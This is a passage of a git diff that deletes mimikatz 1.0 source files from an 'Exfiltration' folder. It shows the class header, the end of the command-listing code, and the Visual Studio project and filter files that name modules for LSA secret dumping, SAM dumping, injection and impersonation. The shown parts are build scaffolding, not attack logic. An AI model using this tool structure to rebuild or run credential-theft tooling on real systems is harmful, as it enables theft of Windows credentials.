monModule = mesModules.begin(); monModule != mesModules.end(); monModule++) - { - (*outputStream) << setw(12) << setfill(wchar_t(' ')) << monModule->module << L"\t- " << monModule->description << endl; - } -} - -void mimikatz::listCommandes(vector<KIWI_MIMIKATZ_LOCAL_MODULE>::iterator monModule) -{ - for(vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND>::iterator maCommande = monModule->commandes.begin(); maCommande != monModule->commandes.end(); maCommande++) - { - if(maCommande->commandName.front() != L':') - (*outputStream) << setw(12) << setfill(wchar_t(' ')) << maCommande->commandName << L"\t- " << maCommande->commandHelp << endl; - } -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/mimikatz.h b/Exfiltration/mimikatz-1.0/mimikatz/mimikatz.h deleted file mode 100644 index 2973368..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/mimikatz.h +++ /dev/null @@ -1,57 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_parseur.h" -#include "mod_pipe.h" -#include "mod_process.h" -#include "mod_system.h" - -#include "modules/mod_mimikatz_standard.h" -#include "modules/mod_mimikatz_crypto.h" -#include "modules/mod_mimikatz_hash.h" -#include "modules/mod_mimikatz_system.h" -#include "modules/mod_mimikatz_process.h" -#include "modules/mod_mimikatz_thread.h" -#include "modules/mod_mimikatz_service.h" -#include "modules/mod_mimikatz_privilege.h" -#include "modules/mod_mimikatz_handle.h" -#include "modules/mod_mimikatz_winmine.h" -#include "modules/mod_mimikatz_minesweeper.h" -#include "modules/mod_mimikatz_nogpo.h" -#include "modules/mod_mimikatz_samdump.h" -#include "modules/mod_mimikatz_inject.h" -#include "modules/mod_mimikatz_terminalserver.h" -#include "modules/mod_mimikatz_divers.h" -#include "modules/mod_mimikatz_impersonate.h" -#include "modules/mod_mimikatz_sekurlsa.h" -#include "modules/mod_mimikatz_efs.h" -#include "global.h" - -class mimikatz -{ -private: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - vector<KIWI_MIMIKATZ_LOCAL_MODULE> mesModules; - bool initLocalModules(); - bool tryToDispatch(wstring * maLigne); - bool doCommandeLocale(wstring * fonction, vector<wstring> * arguments); - bool doCommandeDistante(std::wstring &commande); - bool doCommandeKernel(std::wstring &commande); - - bool openKernel(); - bool closeKernel(); - - void listModules(); - void listCommandes(vector<KIWI_MIMIKATZ_LOCAL_MODULE>::iterator monModule); - - HANDLE Kmimikatz; - -public: - mimikatz(vector<wstring> * mesArguments = NULL); - virtual ~mimikatz(void); -}; - diff --git a/Exfiltration/mimikatz-1.0/mimikatz/mimikatz.rc b/Exfiltration/mimikatz-1.0/mimikatz/mimikatz.rc Binary files differdeleted file mode 100644 index 85dd98f..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/mimikatz.rc +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/mimikatz/mimikatz.vcxproj b/Exfiltration/mimikatz-1.0/mimikatz/mimikatz.vcxproj deleted file mode 100644 index 5c0f138..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/mimikatz.vcxproj +++ /dev/null @@ -1,228 +0,0 @@ -<?xml version="1.0" encoding="utf-8"?> -<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> - <ItemGroup Label="ProjectConfigurations"> - <ProjectConfiguration Include="Release|Win32"> - <Configuration>Release</Configuration> - <Platform>Win32</Platform> - </ProjectConfiguration> - <ProjectConfiguration Include="Release|x64"> - <Configuration>Release</Configuration> - <Platform>x64</Platform> - </ProjectConfiguration> - </ItemGroup> - <PropertyGroup Label="Globals"> - <ProjectGuid>{2A7BA573-8751-4BC2-A8A2-EDD62F7A8AB8}</ProjectGuid> - <Keyword>Win32Proj</Keyword> - <RootNamespace>mimikatz</RootNamespace> - </PropertyGroup> - <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> - <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> - <ConfigurationType>DynamicLibrary</ConfigurationType> - <UseDebugLibraries>false</UseDebugLibraries> - <WholeProgramOptimization>true</WholeProgramOptimization> - <CharacterSet>Unicode</CharacterSet> - <UseOfMfc>Static</UseOfMfc> - </PropertyGroup> - <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> - <ConfigurationType>DynamicLibrary</ConfigurationType> - <UseDebugLibraries>false</UseDebugLibraries> - <WholeProgramOptimization>true</WholeProgramOptimization> - <CharacterSet>Unicode</CharacterSet> - <UseOfMfc>Static</UseOfMfc> - </PropertyGroup> - <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> - <ImportGroup Label="ExtensionSettings"> - </ImportGroup> - <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> - <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> - </ImportGroup> - <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> - <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> - </ImportGroup> - <PropertyGroup Label="UserMacros" /> - <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> - <LinkIncremental>false</LinkIncremental> - <OutDir>$(SolutionDir)$(Platform)\</OutDir> - <IntDir>$(Platform)\</IntDir> - <GenerateManifest>false</GenerateManifest> - </PropertyGroup> - <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> - <LinkIncremental>false</LinkIncremental> - <OutDir>$(SolutionDir)$(Platform)\</OutDir> - <IntDir>$(Platform)\</IntDir> - <GenerateManifest>false</GenerateManifest> - </PropertyGroup> - <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> - <ClCompile> - <WarningLevel>Level3</WarningLevel> - <PrecompiledHeader>NotUsing</PrecompiledHeader> - <Optimization>Full</Optimization> - <FunctionLevelLinking>true</FunctionLevelLinking> - <IntrinsicFunctions>true</IntrinsicFunctions> - <PreprocessorDefinitions>WIN32;NDEBUG;PSAPI_VERSION=1;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> - <AdditionalIncludeDirectories>$(SolutionDir)/commun;$(SolutionDir)/modules;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> - <MultiProcessorCompilation>true</MultiProcessorCompilation> - <FloatingPointModel>Fast</FloatingPointModel> - <FloatingPointExceptions>false</FloatingPointExceptions> - <CreateHotpatchableImage>false</CreateHotpatchableImage> - <StringPooling>true</StringPooling> - <ExceptionHandling>false</ExceptionHandling> - <FavorSizeOrSpeed>Size</FavorSizeOrSpeed> - <ErrorReporting>None</ErrorReporting> - </ClCompile> - <Link> - <SubSystem>Console</SubSystem> - <EnableCOMDATFolding>true</EnableCOMDATFolding> - <OptimizeReferences>true</OptimizeReferences> - <AdditionalDependencies>psapi.lib;advapi32.lib;user32.lib;secur32.lib;crypt32.lib;shlwapi.lib;wtsapi32.lib;shell32.lib</AdditionalDependencies> - <GenerateDebugInformation>false</GenerateDebugInformation> - <LinkErrorReporting>NoErrorReport</LinkErrorReporting> - </Link> - <ResourceCompile> - <Culture>0x040c</Culture> - </ResourceCompile> - </ItemDefinitionGroup> - <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> - <ClCompile> - <WarningLevel>Level3</WarningLevel> - <PrecompiledHeader>NotUsing</PrecompiledHeader> - <Optimization>Full</Optimization> - <FunctionLevelLinking>true</FunctionLevelLinking> - <IntrinsicFunctions>true</IntrinsicFunctions> - <PreprocessorDefinitions>WIN32;NDEBUG;PSAPI_VERSION=1;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> - <AdditionalIncludeDirectories>$(SolutionDir)/commun;$(SolutionDir)/modules;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> - <MultiProcessorCompilation>true</MultiProcessorCompilation> - <FloatingPointModel>Fast</FloatingPointModel> - <FloatingPointExceptions>false</FloatingPointExceptions> - <CreateHotpatchableImage>false</CreateHotpatchableImage> - <StringPooling>true</StringPooling> - <ExceptionHandling>false</ExceptionHandling> - <FavorSizeOrSpeed>Size</FavorSizeOrSpeed> - <ErrorReporting>None</ErrorReporting> - <RuntimeLibrary>MultiThreaded</RuntimeLibrary> - </ClCompile> - <Link> - <SubSystem>Console</SubSystem> - <EnableCOMDATFolding>true</EnableCOMDATFolding> - <OptimizeReferences>true</OptimizeReferences> - <AdditionalDependencies>psapi.lib;advapi32.lib;user32.lib;secur32.lib;crypt32.lib;shlwapi.lib;wtsapi32.lib;shell32.lib</AdditionalDependencies> - <GenerateDebugInformation>false</GenerateDebugInformation> - <LinkErrorReporting>NoErrorReport</LinkErrorReporting> - </Link> - <ResourceCompile> - <Culture>0x040c</Culture> - </ResourceCompile> - </ItemDefinitionGroup> - <ItemGroup> - <ClInclude Include="..\modules\mod_crypto.h" /> - <ClInclude Include="..\modules\mod_cryptoapi.h" /> - <ClInclude Include="..\modules\mod_cryptong.h" /> - <ClInclude Include="..\modules\mod_hash.h" /> - <ClInclude Include="..\modules\mod_hive.h" /> - <ClInclude Include="..\modules\mod_inject.h" /> - <ClInclude Include="..\modules\mod_memory.h" /> - <ClInclude Include="..\modules\mod_minidump.h" /> - <ClInclude Include="..\modules\mod_ntddk.h" /> - <ClInclude Include="..\modules\mod_parseur.h" /> - <ClInclude Include="..\modules\mod_patch.h" /> - <ClInclude Include="..\modules\mod_pipe.h" /> - <ClInclude Include="..\modules\mod_privilege.h" /> - <ClInclude Include="..\modules\mod_process.h" /> - <ClInclude Include="..\modules\mod_secacl.h" /> - <ClInclude Include="..\modules\mod_service.h" /> - <ClInclude Include="..\modules\mod_system.h" /> - <ClInclude Include="..\modules\mod_text.h" /> - <ClInclude Include="..\modules\mod_thread.h" /> - <ClInclude Include="..\modules\mod_ts.h" /> - <ClInclude Include="..\modules\mod_windows.h" /> - <ClInclude Include="..\modules\mod_winsta_desktop.h" /> - <ClInclude Include="global.h" /> - <ClInclude Include="mimikatz.h" /> - <ClInclude Include="modules\LSA Keys\keys_nt5.h" /> - <ClInclude Include="modules\LSA Keys\keys_nt6.h" /> - <ClInclude Include="modules\mod_mimikatz_crypto.h" /> - <ClInclude Include="modules\mod_mimikatz_divers.h" /> - <ClInclude Include="modules\mod_mimikatz_efs.h" /> - <ClInclude Include="modules\mod_mimikatz_handle.h" /> - <ClInclude Include="modules\mod_mimikatz_hash.h" /> - <ClInclude Include="modules\mod_mimikatz_inject.h" /> - <ClInclude Include="modules\mod_mimikatz_minesweeper.h" /> - <ClInclude Include="modules\mod_mimikatz_nogpo.h" /> - <ClInclude Include="modules\mod_mimikatz_privilege.h" /> - <ClInclude Include="modules\mod_mimikatz_process.h" /> - <ClInclude Include="modules\mod_mimikatz_samdump.h" /> - <ClInclude Include="modules\mod_mimikatz_impersonate.h" /> - <ClInclude Include="modules\mod_mimikatz_sekurlsa.h" /> - <ClInclude Include="modules\mod_mimikatz_service.h" /> - <ClInclude Include="modules\mod_mimikatz_standard.h" /> - <ClInclude Include="modules\mod_mimikatz_system.h" /> - <ClInclude Include="modules\mod_mimikatz_terminalserver.h" /> - <ClInclude Include="modules\mod_mimikatz_thread.h" /> - <ClInclude Include="modules\mod_mimikatz_winmine.h" /> - <ClInclude Include="modules\Security Packages\kerberos.h" /> - <ClInclude Include="modules\Security Packages\livessp.h" /> - <ClInclude Include="modules\Security Packages\msv1_0.h" /> - <ClInclude Include="modules\Security Packages\ssp.h" /> - <ClInclude Include="modules\Security Packages\tspkg.h" /> - <ClInclude Include="modules\Security Packages\wdigest.h" /> - </ItemGroup> - <ItemGroup> - <ClCompile Include="..\modules\mod_crypto.cpp" /> - <ClCompile Include="..\modules\mod_cryptoapi.cpp" /> - <ClCompile Include="..\modules\mod_cryptong.cpp" /> - <ClCompile Include="..\modules\mod_hash.cpp" /> - <ClCompile Include="..\modules\mod_hive.cpp" /> - <ClCompile Include="..\modules\mod_inject.cpp" /> - <ClCompile Include="..\modules\mod_memory.cpp" /> - <ClCompile Include="..\modules\mod_minidump.cpp" /> - <ClCompile Include="..\modules\mod_parseur.cpp" /> - <ClCompile Include="..\modules\mod_patch.cpp" /> - <ClCompile Include="..\modules\mod_pipe.cpp" /> - <ClCompile Include="..\modules\mod_privilege.cpp" /> - <ClCompile Include="..\modules\mod_process.cpp" /> - <ClCompile Include="..\modules\mod_secacl.cpp" /> - <ClCompile Include="..\modules\mod_service.cpp" /> - <ClCompile Include="..\modules\mod_system.cpp" /> - <ClCompile Include="..\modules\mod_text.cpp" /> - <ClCompile Include="..\modules\mod_thread.cpp" /> - <ClCompile Include="..\modules\mod_ts.cpp" /> - <ClCompile Include="..\modules\mod_windows.cpp" /> - <ClCompile Include="..\modules\mod_winsta_desktop.cpp" /> - <ClCompile Include="global.cpp" /> - <ClCompile Include="main.cpp" /> - <ClCompile Include="mimikatz.cpp" /> - <ClCompile Include="modules\LSA Keys\keys_nt5.cpp" /> - <ClCompile Include="modules\LSA Keys\keys_nt6.cpp" /> - <ClCompile Include="modules\mod_mimikatz_crypto.cpp" /> - <ClCompile Include="modules\mod_mimikatz_divers.cpp" /> - <ClCompile Include="modules\mod_mimikatz_efs.cpp" /> - <ClCompile Include="modules\mod_mimikatz_handle.cpp" /> - <ClCompile Include="modules\mod_mimikatz_hash.cpp" /> - <ClCompile Include="modules\mod_mimikatz_inject.cpp" /> - <ClCompile Include="modules\mod_mimikatz_minesweeper.cpp" /> - <ClCompile Include="modules\mod_mimikatz_nogpo.cpp" /> - <ClCompile Include="modules\mod_mimikatz_privilege.cpp" /> - <ClCompile Include="modules\mod_mimikatz_process.cpp" /> - <ClCompile Include="modules\mod_mimikatz_samdump.cpp" /> - <ClCompile Include="modules\mod_mimikatz_impersonate.cpp" /> - <ClCompile Include="modules\mod_mimikatz_sekurlsa.cpp" /> - <ClCompile Include="modules\mod_mimikatz_service.cpp" /> - <ClCompile Include="modules\mod_mimikatz_standard.cpp" /> - <ClCompile Include="modules\mod_mimikatz_system.cpp" /> - <ClCompile Include="modules\mod_mimikatz_terminalserver.cpp" /> - <ClCompile Include="modules\mod_mimikatz_thread.cpp" /> - <ClCompile Include="modules\mod_mimikatz_winmine.cpp" /> - <ClCompile Include="modules\Security Packages\kerberos.cpp" /> - <ClCompile Include="modules\Security Packages\livessp.cpp" /> - <ClCompile Include="modules\Security Packages\msv1_0.cpp" /> - <ClCompile Include="modules\Security Packages\ssp.cpp" /> - <ClCompile Include="modules\Security Packages\tspkg.cpp" /> - <ClCompile Include="modules\Security Packages\wdigest.cpp" /> - </ItemGroup> - <ItemGroup> - <ResourceCompile Include="mimikatz.rc" /> - </ItemGroup> - <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> - <ImportGroup Label="ExtensionTargets"> - </ImportGroup> -</Project>
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/mimikatz.vcxproj.filters b/Exfiltration/mimikatz-1.0/mimikatz/mimikatz.vcxproj.filters deleted file mode 100644 index 378149f..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/mimikatz.vcxproj.filters +++ /dev/null @@ -1,386 +0,0 @@ -<?xml version="1.0" encoding="utf-8"?> -<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> - <ItemGroup> - <Filter Include="Modules Communs"> - <UniqueIdentifier>{86154ac4-51c4-4228-9ebb-5bc3c67c82a5}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\Certificats & Clés"> - <UniqueIdentifier>{ab2db025-9ada-4b24-9f10-5bc479e72179}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\Injecteur"> - <UniqueIdentifier>{4745ebd5-cfb4-4ff6-b2a2-5c867f06f52a}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\Mémoire"> - <UniqueIdentifier>{3774201f-55a6-4793-8ca7-b6a9b1ff795b}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\Parseur"> - <UniqueIdentifier>{81abef97-02ad-49e1-abfc-05b3c052b87c}</UniqueIdentifier> - </Filter> - <Filter Include="Modules locaux pour mimikatz"> - <UniqueIdentifier>{5132675e-44a3-4ab9-a33b-91cbeaa9559a}</UniqueIdentifier> - </Filter> - <Filter Include="Modules locaux pour mimikatz\Standard"> - <UniqueIdentifier>{5b8a7a54-517e-4ab4-b7e6-be738e69c0c7}</UniqueIdentifier> - </Filter> - <Filter Include="Modules locaux pour mimikatz\Démineur"> - <UniqueIdentifier>{1c14c20e-5127-461c-8c84-e47f621878a5}</UniqueIdentifier> - </Filter> - <Filter Include="Modules locaux pour mimikatz\AntiGpo"> - <UniqueIdentifier>{13a67a74-e658-49da-8af5-857e3d692af7}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\Registre"> - <UniqueIdentifier>{56b648ea-1ae8-4f7b-90b6-860f84d468d9}</UniqueIdentifier> - </Filter> - <Filter Include="Modules locaux pour mimikatz\Samdump"> - <UniqueIdentifier>{4e99b7f2-6de3-4984-a50a-0f60b3cf74d6}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\Communication"> - <UniqueIdentifier>{e3eb943a-ee7e-4141-afb7-51276c95b0e1}</UniqueIdentifier> - </Filter> - <Filter Include="Modules locaux pour mimikatz\Injecteur"> - <UniqueIdentifier>{3d143a37-f444-4586-8866-b7c022720fb0}</UniqueIdentifier> - </Filter> - <Filter Include="Modules locaux pour mimikatz\Certificats & Clés"> - <UniqueIdentifier>{83996a56-5b3b-4d85-aa27-8cc0d3f1a5b6}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\Patch"> - <UniqueIdentifier>{22cb979b-54ee-4732-bd93-538856c4818f}</UniqueIdentifier> - </Filter> - <Filter Include="Modules locaux pour mimikatz\Terminal Server"> - <UniqueIdentifier>{33450f45-6837-4cba-af7b-457bceebc085}</UniqueIdentifier> - </Filter> - <Filter Include="Modules locaux pour mimikatz\Divers"> - <UniqueIdentifier>{660c14bc-8634-4e80-87d6-39f9dab51e2d}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\Securité et ACL"> - <UniqueIdentifier>{238e934d-2706-4fe3-8b7a-f14c2939f060}</UniqueIdentifier> - </Filter> - <Filter Include="Modules locaux pour mimikatz\System"> - <UniqueIdentifier>{d5a5224b-a3d5-4ebb-9805-08998c7ed015}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\System"> - <UniqueIdentifier>{2a99a328-634d-44e7-bcaa-30112f169554}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\Terminal Server"> - <UniqueIdentifier>{c8277a95-f9da-4352-9bb1-b35c883c6054}</UniqueIdentifier> - </Filter> - <Filter Include="Modules locaux pour mimikatz\Impersonate"> - <UniqueIdentifier>{b482744c-513e-41c6-a766-22adead15ecd}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\Texte"> - <UniqueIdentifier>{a5ed030b-28fe-41b0-9f63-b254fd57400f}</UniqueIdentifier> - </Filter> - <Filter Include="Modules locaux pour mimikatz\SekurLSA"> - <UniqueIdentifier>{77e8ad35-fa4d-4e0d-afdc-ae3060d5370a}</UniqueIdentifier> - </Filter> - <Filter Include="Modules locaux pour mimikatz\SekurLSA\Security Packages"> - <UniqueIdentifier>{43b545d3-ad41-4c42-970d-7850d77b5432}</UniqueIdentifier> - </Filter> - <Filter Include="Modules locaux pour mimikatz\SekurLSA\LSA Keys"> - <UniqueIdentifier>{3a9d8afc-3734-4b86-ab2a-a300a20f956a}</UniqueIdentifier> - </Filter> - </ItemGroup> - <ItemGroup> - <ClInclude Include="mimikatz.h" /> - <ClInclude Include="..\modules\mod_crypto.h"> - <Filter>Modules Communs\Certificats & Clés</Filter> - </ClInclude> - <ClInclude Include="..\modules\mod_inject.h"> - <Filter>Modules Communs\Injecteur</Filter> - </ClInclude> - <ClInclude Include="..\modules\mod_memory.h"> - <Filter>Modules Communs\Mémoire</Filter> - </ClInclude> - <ClInclude Include="..\modules\mod_parseur.h"> - <Filter>Modules Communs\Parseur</Filter> - </ClInclude> - <ClInclude Include="..\modules\mod_process.h"> - <Filter>Modules Communs\System</Filter> - </ClInclude> - <ClInclude Include="modules\mod_mimikatz_crypto.h"> - <Filter>Modules locaux pour mimikatz\Certificats & Clés</Filter> - </ClInclude> - <ClInclude Include="modules\mod_mimikatz_standard.h"> - <Filter>Modules locaux pour mimikatz\Standard</Filter> - </ClInclude> - <ClInclude Include="modules\mod_mimikatz_process.h"> - <Filter>Modules locaux pour mimikatz\System</Filter> - </ClInclude> - <ClInclude Include="modules\mod_mimikatz_winmine.h"> - <Filter>Modules locaux pour mimikatz\Démineur</Filter> - </ClInclude> - <ClInclude Include="modules\mod_mimikatz_nogpo.h"> - <Filter>Modules locaux pour mimikatz\AntiGpo</Filter> - </ClInclude> - <ClInclude Include="..\modules\mod_ntddk.h"> - <Filter>Modules Communs\System</Filter> - </ClInclude> - <ClInclude Include="..\modules\mod_hive.h"> - <Filter>Modules Communs\Registre</Filter> - </ClInclude> - <ClInclude Include="modules\mod_mimikatz_samdump.h"> - <Filter>Modules locaux pour mimikatz\Samdump</Filter> - </ClInclude> - <ClInclude Include="..\modules\mod_pipe.h"> - <Filter>Modules Communs\Communication</Filter> - </ClInclude> - <ClInclude Include="modules\mod_mimikatz_inject.h"> - <Filter>Modules locaux pour mimikatz\Injecteur</Filter> - </ClInclude> - <ClInclude Include="..\modules\mod_cryptoapi.h"> - <Filter>Modules Communs\Certificats & Clés</Filter> - </ClInclude> - <ClInclude Include="..\modules\mod_cryptong.h"> - <Filter>Modules Communs\Certificats & Clés</Filter> - </ClInclude> - <ClInclude Include="..\modules\mod_patch.h"> - <Filter>Modules Communs\Patch</Filter> - </ClInclude> - <ClInclude Include="modules\mod_mimikatz_terminalserver.h"> - <Filter>Modules locaux pour mimikatz\Terminal Server</Filter> - </ClInclude> - <ClInclude Include="modules\mod_mimikatz_divers.h"> - <Filter>Modules locaux pour mimikatz\Divers</Filter> - </ClInclude> - <ClInclude Include="..\modules\mod_secacl.h"> - <Filter>Modules Communs\Securité et ACL</Filter> - </ClInclude> - <ClInclude Include="modules\mod_mimikatz_thread.h"> - <Filter>Modules locaux pour mimikatz\System</Filter> - </ClInclude> - <ClInclude Include="modules\mod_mimikatz_service.h"> - <Filter>Modules locaux pour mimikatz\System</Filter> - </ClInclude> - <ClInclude Include="modules\mod_mimikatz_privilege.h"> - <Filter>Modules locaux pour mimikatz\System</Filter> - </ClInclude> - <ClInclude Include="..\modules\mod_service.h"> - <Filter>Modules Communs\System</Filter> - </ClInclude> - <ClInclude Include="..\modules\mod_thread.h"> - <Filter>Modules Communs\System</Filter> - </ClInclude> - <ClInclude Include="..\modules\mod_privilege.h"> - <Filter>Modules Communs\System</Filter> - </ClInclude> - <ClInclude Include="..\modules\mod_system.h"> - <Filter>Modules Communs\System</Filter> - </ClInclude> - <ClInclude Include="modules\mod_mimikatz_system.h"> - <Filter>Modules locaux pour mimikatz\System</Filter> - </ClInclude> - <ClInclude Include="..\modules\mod_ts.h"> - <Filter>Modules Communs\Terminal Server</Filter> - </ClInclude> - <ClInclude Include="modules\mod_mimikatz_impersonate.h"> - <Filter>Modules locaux pour mimikatz\Impersonate</Filter> - </ClInclude> - <ClInclude Include="modules\mod_mimikatz_handle.h"> - <Filter>Modules locaux pour mimikatz\System</Filter> - </ClInclude> - <ClInclude Include="..\modules\mod_text.h"> - <Filter>Modules Communs\Texte</Filter> - </ClInclude> - <ClInclude Include="..\modules\mod_hash.h"> - <Filter>Modules Communs\Certificats & Clés</Filter> - </ClInclude> - <ClInclude Include="modules\mod_mimikatz_hash.h"> - <Filter>Modules locaux pour mimikatz\Certificats & Clés</Filter> - </ClInclude> - <ClInclude Include="..\modules\mod_windows.h"> - <Filter>Modules Communs\System</Filter> - </ClInclude> - <ClInclude Include="modules\mod_mimikatz_minesweeper.h"> - <Filter>Modules locaux pour mimikatz\Démineur</Filter> - </ClInclude> - <ClInclude Include="modules\mod_mimikatz_sekurlsa.h"> - <Filter>Modules locaux pour mimikatz\SekurLSA</Filter> - </ClInclude> - <ClInclude Include="modules\Security Packages\wdigest.h"> - <Filter>Modules locaux pour mimikatz\SekurLSA\Security Packages</Filter> - </ClInclude> - <ClInclude Include="modules\Security Packages\kerberos.h"> - <Filter>Modules locaux pour mimikatz\SekurLSA\Security Packages</Filter> - </ClInclude> - <ClInclude Include="modules\Security Packages\tspkg.h"> - <Filter>Modules locaux pour mimikatz\SekurLSA\Security Packages</Filter> - </ClInclude> - <ClInclude Include="modules\Security Packages\livessp.h"> - <Filter>Modules locaux pour mimikatz\SekurLSA\Security Packages</Filter> - </ClInclude> - <ClInclude Include="modules\Security Packages\msv1_0.h"> - <Filter>Modules locaux pour mimikatz\SekurLSA\Security Packages</Filter> - </ClInclude> - <ClInclude Include="modules\mod_mimikatz_efs.h"> - <Filter>Modules locaux pour mimikatz\Certificats & Clés</Filter> - </ClInclude> - <ClInclude Include="..\modules\mod_minidump.h"> - <Filter>Modules Communs\System</Filter> - </ClInclude> - <ClInclude Include="..\modules\mod_winsta_desktop.h"> - <Filter>Modules Communs\System</Filter> - </ClInclude> - <ClInclude Include="modules\Security Packages\ssp.h"> - <Filter>Modules locaux pour mimikatz\SekurLSA\Security Packages</Filter> - </ClInclude> - <ClInclude Include="modules\LSA Keys\keys_nt5.h"> - <Filter>Modules locaux pour mimikatz\SekurLSA\LSA Keys</Filter> - </ClInclude> - <ClInclude Include="modules\LSA Keys\keys_nt6.h"> - <Filter>Modules locaux pour mimikatz\SekurLSA\LSA Keys</Filter> - </ClInclude> - <ClInclude Include="global.h" /> - </ItemGroup> - <ItemGroup> - <ClCompile Include="main.cpp" /> - <ClCompile Include="mimikatz.cpp" /> - <ClCompile Include="..\modules\mod_crypto.cpp"> - <Filter>Modules Communs\Certificats & Clés</Filter> - </ClCompile> - <ClCompile Include="..\modules\mod_inject.cpp"> - <Filter>Modules Communs\Injecteur</Filter> - </ClCompile> - <ClCompile Include="..\modules\mod_memory.cpp"> - <Filter>Modules Communs\Mémoire</Filter> - </ClCompile> - <ClCompile Include="..\modules\mod_parseur.cpp"> - <Filter>Modules Communs\Parseur</Filter> - </ClCompile> - <ClCompile Include="..\modules\mod_process.cpp"> - <Filter>Modules Communs\System</Filter> - </ClCompile> - <ClCompile Include="modules\mod_mimikatz_crypto.cpp"> - <Filter>Modules locaux pour mimikatz\Certificats & Clés</Filter> - </ClCompile> - <ClCompile Include="modules\mod_mimikatz_standard.cpp"> - <Filter>Modules locaux pour mimikatz\Standard</Filter> - </ClCompile> - <ClCompile Include="modules\mod_mimikatz_winmine.cpp"> - <Filter>Modules locaux pour mimikatz\Démineur</Filter> - </ClCompile> - <ClCompile Include="modules\mod_mimikatz_nogpo.cpp"> - <Filter>Modules locaux pour mimikatz\AntiGpo</Filter> - </ClCompile> - <ClCompile Include="..\modules\mod_hive.cpp"> - <Filter>Modules Communs\Registre</Filter> - </ClCompile> - <ClCompile Include="modules\mod_mimikatz_samdump.cpp"> - <Filter>Modules locaux pour mimikatz\Samdump</Filter> - </ClCompile> - <ClCompile Include="..\modules\mod_pipe.cpp"> - <Filter>Modules Communs\Communication</Filter> - </ClCompile> - <ClCompile Include="modules\mod_mimikatz_inject.cpp"> - <Filter>Modules locaux pour mimikatz\Injecteur</Filter> - </ClCompile> - <ClCompile Include="..\modules\mod_cryptoapi.cpp"> - <Filter>Modules Communs\Certificats & Clés</Filter> - </ClCompile> - <ClCompile Include="..\modules\mod_cryptong.cpp"> - <Filter>Modules Communs\Certificats & Clés</Filter> - </ClCompile> - <ClCompile Include="..\modules\mod_patch.cpp"> - <Filter>Modules Communs\Patch</Filter> - </ClCompile> - <ClCompile Include="modules\mod_mimikatz_terminalserver.cpp"> - <Filter>Modules locaux pour mimikatz\Terminal Server</Filter> - </ClCompile> - <ClCompile Include="modules\mod_mimikatz_divers.cpp"> - <Filter>Modules locaux pour mimikatz\Divers</Filter> - </ClCompile> - <ClCompile Include="..\modules\mod_secacl.cpp"> - <Filter>Modules Communs\Securité et ACL</Filter> - </ClCompile> - <ClCompile Include="modules\mod_mimikatz_thread.cpp"> - <Filter>Modules locaux pour mimikatz\System</Filter> - </ClCompile> - <ClCompile Include="modules\mod_mimikatz_service.cpp"> - <Filter>Modules locaux pour mimikatz\System</Filter> - </ClCompile> - <ClCompile Include="modules\mod_mimikatz_privilege.cpp"> - <Filter>Modules locaux pour mimikatz\System</Filter> - </ClCompile> - <ClCompile Include="..\modules\mod_system.cpp"> - <Filter>Modules Communs\System</Filter> - </ClCompile> - <ClCompile Include="..\modules\mod_thread.cpp"> - <Filter>Modules Communs\System</Filter> - </ClCompile> - <ClCompile Include="..\modules\mod_service.cpp"> - <Filter>Modules Communs\System</Filter> - </ClCompile> - <ClCompile Include="..\modules\mod_privilege.cpp"> - <Filter>Modules Communs\System</Filter> - </ClCompile> - <ClCompile Include="modules\mod_mimikatz_system.cpp"> - <Filter>Modules locaux pour mimikatz\System</Filter> - </ClCompile> - <ClCompile Include="..\modules\mod_ts.cpp"> - <Filter>Modules Communs\Terminal Server</Filter> - </ClCompile> - <ClCompile Include="modules\mod_mimikatz_impersonate.cpp"> - <Filter>Modules locaux pour 